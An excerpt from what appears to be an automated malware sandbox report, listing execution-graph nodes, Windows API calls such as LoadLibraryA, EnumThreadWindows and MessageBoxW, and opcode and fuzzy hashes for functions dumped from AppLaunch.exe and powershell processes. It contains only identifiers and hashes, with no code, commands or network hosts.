                            • Opcode Fuzzy Hash: e6740b67d8ea3cce57e266a89eefae367b278712da7b405b05f3d166c9277181
                            • Instruction Fuzzy Hash: B5A01102A0828283FE282B8280A223C888A0F80320E2000BBA00B0A0C28C0CAA032202
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:14.7%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:0%
                            Total number of Nodes:73
                            Total number of Limit Nodes:1
                            execution_graph 19546 9411040 19550 9411049 19546->19550 19547 94110d1 19550->19547 19551 94117d4 19550->19551 19558 9411749 19550->19558 19552 94117e2 19551->19552 19553 9411792 19551->19553 19564 9415644 19553->19564 19571 9415658 19553->19571 19578 9415616 19553->19578 19554 94117c8 19554->19547 19560 9411752 19558->19560 19559 94117c8 19559->19547 19561 9415644 2 API calls 19560->19561 19562 9415616 2 API calls 19560->19562 19563 9415658 2 API calls 19560->19563 19561->19559 19562->19559 19563->19559 19567 9415658 19564->19567 19565 941586f 19593 9415234 19565->19593 19567->19565 19568 941589d 19567->19568 19585 9416390 19567->19585 19589 94163a0 19567->19589 19568->19554 19573 9415682 19571->19573 19572 941586f 19574 9415234 MessageBoxW 19572->19574 19573->19572 19575 941589d 19573->19575 19576 9416390 OleInitialize 19573->19576 19577 94163a0 OleInitialize 19573->19577 19574->19575 19575->19554 19576->19572 19577->19572 19581 9415625 19578->19581 19579 941586f 19580 9415234 MessageBoxW 19579->19580 19582 941589d 19580->19582 19581->19579 19581->19582 19583 9416390 OleInitialize 19581->19583 19584 94163a0 OleInitialize 19581->19584 19582->19554 19583->19579 19584->19579 19586 94163a0 19585->19586 19597 9415e4c 19586->19597 19590 94163a9 19589->19590 19591 9415e4c OleInitialize 19590->19591 19592 94163b4 19591->19592 19592->19565 19594 9418710 MessageBoxW 19593->19594 19596 941879c 19594->19596 19596->19568 19598 9415e57 19597->19598 19601 9416e1c 19598->19601 19600 9417082 19602 9416e27 19601->19602 19604 9417161 19602->19604 19605 9416ef4 19602->19605 19604->19600 19606 9416eff 19605->19606 19607 941749b 19606->19607 19609 9416f10 19606->19609 19607->19604 19610 94174d0 OleInitialize 19609->19610 19611 9417534 19610->19611 19611->19607 19612 94166a0 DuplicateHandle 19613 9416736 19612->19613 19614 5327d90 19615 5327dae 19614->19615 19618 532617c 19615->19618 19617 5327de5 19620 53298b0 LoadLibraryA 19618->19620 19621 53299a9 19620->19621 19622 94170bf 19625 9416e2c 19622->19625 19626 9416e37 19625->19626 19630 9418281 19626->19630 19634 9418290 19626->19634 19627 94170cc 19631 94182df 19630->19631 19638 9416f7c 19631->19638 19635 94182df 19634->19635 19636 9416f7c EnumThreadWindows 19635->19636 19637 9418360 19636->19637 19637->19627 19640 9418380 EnumThreadWindows 19638->19640 19641 9418360 19640->19641 19641->19627

                            Executed Functions

                            Function 09416F10 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46comCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1826 9416f10-9417532 OleInitialize 1828 9417534-941753a 1826->1828 1829 941753b-9417558 1826->1829 1828->1829
                            APIs
                            • OleInitialize.OLE32(00000000), ref: 09417525
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.513646013.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_9410000_AppLaunch.jbxd
                            Similarity
                            • API ID: Initialize
                            • String ID: d!
                            • API String ID: 2538663250-4126614057
                            • Opcode ID: c320fdabbc4a6e776f548a8afae72c85aa73def70a9f870ff4e51c863af86ac9
                            • Instruction ID: 6bf23fb9d6afdb53323aff6508fa9ecc971a506a4cf0bfe96228fcbf3ec755b9
                            • Opcode Fuzzy Hash: c320fdabbc4a6e776f548a8afae72c85aa73def70a9f870ff4e51c863af86ac9
                            • Instruction Fuzzy Hash: 251103B1904348CFCB10CF99D544BDEBBF4EB58324F14845AE559A7710C375A944CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 09416F88 Relevance: 1.6, APIs: 1, Instructions: 100threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2292 9416f88-9416fa1 2294 9416fa3-9416faf 2292->2294 2295 9416f7f-9416f83 2292->2295 2296 9418380-94183c2 2294->2296 2300 94186c8-94186d3 2294->2300 2295->2296 2297 94183c4 2296->2297 2298 94183ce-94183fe EnumThreadWindows 2296->2298 2305 94183cc 2297->2305 2301 9418400-9418406 2298->2301 2302 9418407-9418434 2298->2302 2303 94186d5-94186df 2300->2303 2304 94186fb-94186ff 2300->2304 2301->2302 2303->2304 2309 94186e1-94186fa 2303->2309 2305->2298
                            APIs
                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E28,?,?,09418360,07CC6D30,06D54CF0), ref: 094183F1
                            Memory Dump Source
                            • Source File: 00000005.00000002.513646013.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_9410000_AppLaunch.jbxd
                            Similarity
                            • API ID: EnumThreadWindows
                            • String ID:
                            • API String ID: 2941952884-0
                            • Opcode ID: 4dc828ef8fd3ebb70f5e02c6baf7671d857dcc21df487cc426d581df9e0839b2
                            • Instruction ID: 43e0a03f40d3450cc5fa2cb38b6b033bac62fff9f4cf31b88ce1348e072938f9
                            • Opcode Fuzzy Hash: 4dc828ef8fd3ebb70f5e02c6baf7671d857dcc21df487cc426d581df9e0839b2
                            • Instruction Fuzzy Hash: F6319C71A042198FC714CFA9C944AEEBBF5FF59324F05846AE445EB361C774A841CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 053298A5 Relevance: 1.6, APIs: 1, Instructions: 98libraryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2312 53298a5-5329907 2313 532995b-53299a7 LoadLibraryA 2312->2313 2314 5329909-532992e 2312->2314 2318 53299b0-53299e1 2313->2318 2319 53299a9-53299af 2313->2319 2314->2313 2317 5329930-5329932 2314->2317 2320 5329934-532993e 2317->2320 2321 5329955-5329958 2317->2321 2326 53299e3-53299e7 2318->2326 2327 53299f1 2318->2327 2319->2318 2323 5329942-5329951 2320->2323 2324 5329940 2320->2324 2321->2313 2323->2323 2328 5329953 2323->2328 2324->2323 2326->2327 2329 53299e9 2326->2329 2330 53299f2 2327->2330 2328->2321 2329->2327 2330->2330
                            APIs
                            • LoadLibraryA.KERNELBASE(?), ref: 05329997
                            Memory Dump Source
                            • Source File: 00000005.00000002.511110883.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_5320000_AppLaunch.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: a714cfe3e81b75d1e7b3fb148821a42b7ca4dfb8febf105c60baee0bb68a60ac
                            • Instruction ID: 7d2246fff4b390a51a36252b347c6527f859f39939dad0fa9e0ade498dd34ed2
                            • Opcode Fuzzy Hash: a714cfe3e81b75d1e7b3fb148821a42b7ca4dfb8febf105c60baee0bb68a60ac
                            • Instruction Fuzzy Hash: 204159B1D106198FDB10CFA9C88579EBBF1FB48324F148129E815E7380D7B49886CF92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0532617C Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2331 532617c-5329907 2333 532995b-53299a7 LoadLibraryA 2331->2333 2334 5329909-532992e 2331->2334 2338 53299b0-53299e1 2333->2338 2339 53299a9-53299af 2333->2339 2334->2333 2337 5329930-5329932 2334->2337 2340 5329934-532993e 2337->2340 2341 5329955-5329958 2337->2341 2346 53299e3-53299e7 2338->2346 2347 53299f1 2338->2347 2339->2338 2343 5329942-5329951 2340->2343 2344 5329940 2340->2344 2341->2333 2343->2343 2348 5329953 2343->2348 2344->2343 2346->2347 2349 53299e9 2346->2349 2350 53299f2 2347->2350 2348->2341 2349->2347 2350->2350
                            APIs
                            • LoadLibraryA.KERNELBASE(?), ref: 05329997
                            Memory Dump Source
                            • Source File: 00000005.00000002.511110883.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_5320000_AppLaunch.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: e946ba2a2d367d858761505cc67dbe4349eed92cd5896badec9d9f56e41b0bbd
                            • Instruction ID: 57b15e2f0859322fb72f9970d6838d2f1bce5a321ba22d8f37e3ec3b8cb82bdf
                            • Opcode Fuzzy Hash: e946ba2a2d367d858761505cc67dbe4349eed92cd5896badec9d9f56e41b0bbd
                            • Instruction Fuzzy Hash: 9D414AB1D046689FDB10CFA9C88479EBBF1FB48314F148129E815E7384D7B49885CF92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 09418709 Relevance: 1.6, APIs: 1, Instructions: 67windowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2351 9418709-941870d 2352 94186eb-94186fa 2351->2352 2353 941870f-9418753 2351->2353 2355 9418755-9418758 2353->2355 2356 941875b-941875f 2353->2356 2355->2356 2357 9418761-9418764 2356->2357 2358 9418767-941879a MessageBoxW 2356->2358 2357->2358 2359 94187a3-94187b7 2358->2359 2360 941879c-94187a2 2358->2360 2360->2359
                            APIs
                            • MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,0941589D,?,?,?), ref: 0941878D
                            Memory Dump Source
                            • Source File: 00000005.00000002.513646013.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_9410000_AppLaunch.jbxd
                            Similarity
                            • API ID: Message
                            • String ID:
                            • API String ID: 2030045667-0
                            • Opcode ID: 9397988aefe55e8c7e4f009cacedf20e36411cad95a581900c7a990e4acb19a0
                            • Instruction ID: 602624b312e1093c764b72c7d05aa329b4ac4faee08574aa0571b5ddaa9471f5
                            • Opcode Fuzzy Hash: 9397988aefe55e8c7e4f009cacedf20e36411cad95a581900c7a990e4acb19a0
                            • Instruction Fuzzy Hash: EC2122B6901349DFCB14CFA9D884AEEBBB4FB88314F24852EE819A7700C3759544CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 09416698 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                            Download Yara Rule
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 09416727
                            Memory Dump Source
                            • Source File: 00000005.00000002.513646013.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_9410000_AppLaunch.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: 29ea6d9227dffcea35ab22d14865292f4c586e1cceaf81dd5cc6436957e4804a
                            • Instruction ID: d68de6b6b53113e7c9a29f94fa74186ec7d484ee34c3f59d98987cfaea397f34
                            • Opcode Fuzzy Hash: 29ea6d9227dffcea35ab22d14865292f4c586e1cceaf81dd5cc6436957e4804a
                            • Instruction Fuzzy Hash: 3621E3B5D04248EFDB10CFAAD984ADEBBF8FB48324F15841AE954A7310C374A954CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 09416F7C Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                            Download Yara Rule
                            APIs
                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E28,?,?,09418360,07CC6D30,06D54CF0), ref: 094183F1
                            Memory Dump Source
                            • Source File: 00000005.00000002.513646013.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_9410000_AppLaunch.jbxd
                            Similarity
                            • API ID: EnumThreadWindows
                            • String ID:
                            • API String ID: 2941952884-0
                            • Opcode ID: cb91e4c25ca9d7031c149ac01e8a257deb089b67b6a7e793f70fb6ddaad73029
                            • Instruction ID: 625e2c398ff2ca2781ad6588b849cdf4248dc872c4e1b2fb20d4a9c6a5ef3f8c
                            • Opcode Fuzzy Hash: cb91e4c25ca9d7031c149ac01e8a257deb089b67b6a7e793f70fb6ddaad73029
                            • Instruction Fuzzy Hash: 3021F3719042198FDB14CF9AC844BEEBBF5EB98320F14842AE854A7340D774A945CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 09418379 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                            Download Yara Rule
                            APIs
                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E28,?,?,09418360,07CC6D30,06D54CF0), ref: 094183F1
                            Memory Dump Source
                            • Source File: 00000005.00000002.513646013.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_9410000_AppLaunch.jbxd
                            Similarity
                            • API ID: EnumThreadWindows
                            • String ID:
                            • API String ID: 2941952884-0
                            • Opcode ID: 4f1e0a4eea229463451d91a8ca55d7e9aa07f77973cca3d5801adda56628c22f
                            • Instruction ID: 4859b9369f2c5842ffd0edbdee65df33a08054c9f281c34081c19edc3d0b26b4
                            • Opcode Fuzzy Hash: 4f1e0a4eea229463451d91a8ca55d7e9aa07f77973cca3d5801adda56628c22f
                            • Instruction Fuzzy Hash: 11211FB1D002498FDB14CFA9C844BEEBBF5BB98324F18842AE454A7350C779A945CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 094166A0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                            Download Yara Rule
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 09416727
                            Memory Dump Source
                            • Source File: 00000005.00000002.513646013.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_9410000_AppLaunch.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: d26617c2846cb384657e80667b9c3a3f25825f5d67fcf461285b7a99d2d5baa2
                            • Instruction ID: 05e68c6744b9d996671115c74a973b0fca7a13837271599528799141c71468c6
                            • Opcode Fuzzy Hash: d26617c2846cb384657e80667b9c3a3f25825f5d67fcf461285b7a99d2d5baa2
                            • Instruction Fuzzy Hash: AA21E2B5D002489FDB10CFAAD984ADEBBF8FB48320F14841AE954A7310C374A954CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 09415234 Relevance: 1.6, APIs: 1, Instructions: 60windowCOMMON
                            Download Yara Rule
                            APIs
                            • MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,0941589D,?,?,?), ref: 0941878D
                            Memory Dump Source
                            • Source File: 00000005.00000002.513646013.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_9410000_AppLaunch.jbxd
                            Similarity
                            • API ID: Message
                            • String ID:
                            • API String ID: 2030045667-0
                            • Opcode ID: 758ef4810e8ee94c522938160dcf0002579109d11f7097543b7132c5f5c6cb0c
                            • Instruction ID: 25a7064202ab54e5be06f2e0efc7b73d8ba40adf2d64593ee59e263214e0e940
                            • Opcode Fuzzy Hash: 758ef4810e8ee94c522938160dcf0002579109d11f7097543b7132c5f5c6cb0c
                            • Instruction Fuzzy Hash: 6E21F3B59013499FCB10CF99D884ADEBBF4FB48310F14852EE929A7700C375A545CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 094174C9 Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON
                            Download Yara Rule
                            APIs
                            • OleInitialize.OLE32(00000000), ref: 09417525
                            Memory Dump Source
                            • Source File: 00000005.00000002.513646013.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_9410000_AppLaunch.jbxd
                            Similarity
                            • API ID: Initialize
                            • String ID:
                            • API String ID: 2538663250-0
                            • Opcode ID: c6e77c51a22290bd4fc421595ef994e33eeea3f97c5777cee81ce035d9ff074b
                            • Instruction ID: 30a901d4deb51eda25df26f30c48d0b248cdccc70d1ce3e490823729f8831383
                            • Opcode Fuzzy Hash: c6e77c51a22290bd4fc421595ef994e33eeea3f97c5777cee81ce035d9ff074b
                            • Instruction Fuzzy Hash: 561133B1D04248CFCB10CFA9D544BCEBBF4EB48324F24845AE518A7710C379A544CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0518D5CC Relevance: .1, Instructions: 75COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.510578628.000000000518D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0518D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_518d000_AppLaunch.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 070bc54cca91ee3166ed299bcde5d7ba453b761935dad3a054123331bfdcef76
                            • Instruction ID: 5aa8a744532564059e122d9a1291b7132d6303627b04caa8f4e81f76763352b2
                            • Opcode Fuzzy Hash: 070bc54cca91ee3166ed299bcde5d7ba453b761935dad3a054123331bfdcef76
                            • Instruction Fuzzy Hash: 3421D6B1504348DFDB25EF10E9C0F36BF66FB88324F258669E9094B286C736D855CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0518D4E0 Relevance: .1, Instructions: 75COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.510578628.000000000518D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0518D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_518d000_AppLaunch.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 15fe55be1f8fa2f48bc284e6d1daefe30a7db70403c4e7fb284e67fc0308e36d
                            • Instruction ID: 215fff00bfaf9b4a0d731b22e7565f838388e8cc32dcebec5520bce45aa4074d
                            • Opcode Fuzzy Hash: 15fe55be1f8fa2f48bc284e6d1daefe30a7db70403c4e7fb284e67fc0308e36d
                            • Instruction Fuzzy Hash: A021E2B1504340DFDB24EF10E9C0B36BB76FB88228F24856AD9054B286C336D859CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0518D4DB Relevance: .1, Instructions: 56COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.510578628.000000000518D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0518D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_518d000_AppLaunch.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6866c8b08434bdbd5fa1578fb5b946e87ca1ac65ff923eebbf5c9b940695a3d8
                            • Instruction ID: 31695df1d252694f33c96c20ce2671d0fd0f9327f6d9b9b1de1fe3261be0cdbd
                            • Opcode Fuzzy Hash: 6866c8b08434bdbd5fa1578fb5b946e87ca1ac65ff923eebbf5c9b940695a3d8
                            • Instruction Fuzzy Hash: 0011AF76804380DFDB11DF10E5C4B26BF72FB88324F2886AAD8090B656C336D45ACFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0518D5C7 Relevance: .1, Instructions: 56COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.510578628.000000000518D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0518D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_518d000_AppLaunch.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6866c8b08434bdbd5fa1578fb5b946e87ca1ac65ff923eebbf5c9b940695a3d8
                            • Instruction ID: eaae6f115edfa8d849c9680f0c3db86797d534e89cbf5f92af4901a845aee54f
                            • Opcode Fuzzy Hash: 6866c8b08434bdbd5fa1578fb5b946e87ca1ac65ff923eebbf5c9b940695a3d8
                            • Instruction Fuzzy Hash: 4711B176804284DFCB11DF10E5C4B66BF72FB88320F2486A9D8490B656C336D45ACFA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Executed Functions

                            Function 00007FFF7E3F7505 Relevance: .1, Instructions: 128COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000008.00000002.304267128.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7fff7e3f0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 416b9bac5829b8c30d5eff807934dfa51cf19f95e08f2bd4e6fb697d791f8d11
                            • Instruction ID: a35ac36de6e45b3c2271f5f73b57a17edd4439ed813cbaf5b5dc2a6ac35c2816
                            • Opcode Fuzzy Hash: 416b9bac5829b8c30d5eff807934dfa51cf19f95e08f2bd4e6fb697d791f8d11
                            • Instruction Fuzzy Hash: C931E53191CB488FDB189B5C9C0AAA97BE0FB59321F00426FE049D3252DB74A855CBC2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F74A9 Relevance: .1, Instructions: 112COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000008.00000002.304267128.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7fff7e3f0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f70e4a554fcb3a348da4c027e76f786abf19ee39fa5fa837bcbbf517e31b54a4
                            • Instruction ID: f71cc729d3091c485966278728670566f5e9eb24a4f2c613e7fffa983517f231
                            • Opcode Fuzzy Hash: f70e4a554fcb3a348da4c027e76f786abf19ee39fa5fa837bcbbf517e31b54a4
                            • Instruction Fuzzy Hash: F331863191CB4C8FDB58DB5C98466ACBBE0FB68321F00422FE44DD3651DB75A8558BC2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F1CE0 Relevance: .1, Instructions: 111COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000008.00000002.304267128.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7fff7e3f0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7a4c7129270c81a089a9a3ca63ec708e3e7760163133052890c37560a465dc0f
                            • Instruction ID: ec2ed16642756e374a92eaabef8c891f4295736bf2f4c2b1e41f676a1b5f0636
                            • Opcode Fuzzy Hash: 7a4c7129270c81a089a9a3ca63ec708e3e7760163133052890c37560a465dc0f
                            • Instruction Fuzzy Hash: 7531B13291C7894FC345DB28D4509AAFBE1EF99310F0406BBF089D72A7DA299945C782
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F806A Relevance: .1, Instructions: 86COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000008.00000002.304267128.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7fff7e3f0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3a1b57cb57ed762a9224f29c4e512045ac813061443b525ab60d6337166588b2
                            • Instruction ID: 0029cf0bcca340b40ada71da21628c123bf011147421ebb3adc720aac39535f2
                            • Opcode Fuzzy Hash: 3a1b57cb57ed762a9224f29c4e512045ac813061443b525ab60d6337166588b2
                            • Instruction Fuzzy Hash: A821A13190CA0C8FDB58DF9C984A7E97BE0EBA9321F00812FD449D3251DA75945ACB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F7575 Relevance: .1, Instructions: 68COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000008.00000002.304267128.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7fff7e3f0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3bb2648031358d70274b17c484372195aa655b3c0cb06a414522f0edbdc459b2
                            • Instruction ID: 17182d012f6c463f2922f6f1ada2566f8c753d992efb052b8cae6390f3a16e97
                            • Opcode Fuzzy Hash: 3bb2648031358d70274b17c484372195aa655b3c0cb06a414522f0edbdc459b2
                            • Instruction Fuzzy Hash: 73118F3192CB488FDB489F4CEC46698BBE0FB59725F00825FE44983252D734A8558BC7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F1775 Relevance: .0, Instructions: 49COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000008.00000002.304267128.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7fff7e3f0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ffb95c3d89c640460735b135889647b220a84629021a94207b6a2b2c198c111f
                            • Instruction ID: 33619907dc9d9be357ac43a05f765df8204d6b792844c593f2466836a9b28d45
                            • Opcode Fuzzy Hash: ffb95c3d89c640460735b135889647b220a84629021a94207b6a2b2c198c111f
                            • Instruction Fuzzy Hash: 8B01677111CB0C4FD748EF0CE451AAAB7E0FB95364F10056EE58AC3652DA36E882CB45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E4C4155 Relevance: .0, Instructions: 37COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000008.00000002.304415183.00007FFF7E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E4C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7fff7e4c0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bf08827e639ba43590d408f61acb97ade32a58e053a6085c6bfbf7d88935f3a5
                            • Instruction ID: b1cf6c5efe22b355146859925ae098da39f15dd9f476984450bb9507ebb3c279
                            • Opcode Fuzzy Hash: bf08827e639ba43590d408f61acb97ade32a58e053a6085c6bfbf7d88935f3a5
                            • Instruction Fuzzy Hash: A4F09032A1C5454FE358EB4DE1459A8B7D1EF65330F1800BBE18FC71A3DD29AC418681
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F7CB6 Relevance: .0, Instructions: 33COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000008.00000002.304267128.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7fff7e3f0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a7ab3f520e51419a9c6888ce271f66078d8cd039e3a7bebe9f568ea1d1a909fb
                            • Instruction ID: fee5fbb09b1cb38a8734eed936957a8f23477af302095eb35ca1de46bb30ec27
                            • Opcode Fuzzy Hash: a7ab3f520e51419a9c6888ce271f66078d8cd039e3a7bebe9f568ea1d1a909fb
                            • Instruction Fuzzy Hash: E1F0303545878C8FCB46DF2498588A57BF0FA5521070682DBE84DCB562D7649958CB82
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E4C4403 Relevance: .0, Instructions: 32COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000008.00000002.304415183.00007FFF7E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E4C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7fff7e4c0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 14b1963135efc748fac6353224ffdc329c1a7f2f047f8a4270aa0fc3eb5fe0a4
                            • Instruction ID: 7d11a5b3e79002d2836a53f0007851cf81abf5f48c17b9a6cae206315b6e1e4f
                            • Opcode Fuzzy Hash: 14b1963135efc748fac6353224ffdc329c1a7f2f047f8a4270aa0fc3eb5fe0a4
                            • Instruction Fuzzy Hash: 13F03932A0C4098FE758EB0DE081AECB7E1EF84320F5100B7E24EC7563DA26EC518791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F4CA0 Relevance: .0, Instructions: 24COMMON
                            Download Yara Rule
                            Memory Dump Source
